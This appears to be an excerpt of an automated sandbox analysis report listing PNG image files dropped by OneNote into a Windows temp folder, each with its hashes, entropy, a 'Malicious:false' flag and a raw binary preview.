                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{18710D6B-F1E6-4CEC-B2E3-88F6F8F6ADEC}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{1C54229F-B4AC-4B4F-A5C4-B6C0870196B9}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3879
                                                                                                                                                    Entropy (8bit):7.9281351307465044
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                    MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                    SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                    SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                    SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{20691C45-3912-4E04-9F9D-7D785AADBB33}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{22C00A46-DB88-4EF8-9B6E-FA6F60F7F1EF}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{235F4D30-C8DD-49E5-ACF3-C6D78A5C54D8}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22634
                                                                                                                                                    Entropy (8bit):7.974332204835705
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                    MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                    SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                    SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                    SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{23D3D0F8-5DF7-4934-B460-BAA6B954BE34}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8184
                                                                                                                                                    Entropy (8bit):7.807848176906598
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                    MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                    SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                    SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                    SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{24383C51-047F-41BD-A1B0-F3217D15FC44}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2599
                                                                                                                                                    Entropy (8bit):7.903700862190034
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                    MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                    SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                    SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                    SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2741F630-66F3-4FC2-A595-4AAEF2545FD7}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11449
                                                                                                                                                    Entropy (8bit):7.91552812501629
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                    MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                    SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                    SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                    SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{27D3169C-2C40-403C-9C05-53FD1A6D7C54}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2870A86B-64C3-4442-809B-DCA34ACE9854}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8184
                                                                                                                                                    Entropy (8bit):7.807848176906598
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                    MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                    SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                    SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                    SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{2949D679-7E97-4142-90C8-19A1367FE15E}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{29D0BF62-CFEF-4BA3-87B4-DA58BF4FF1E5}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2332
                                                                                                                                                    Entropy (8bit):7.8822150338370776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                    MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                    SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                    SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                    SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

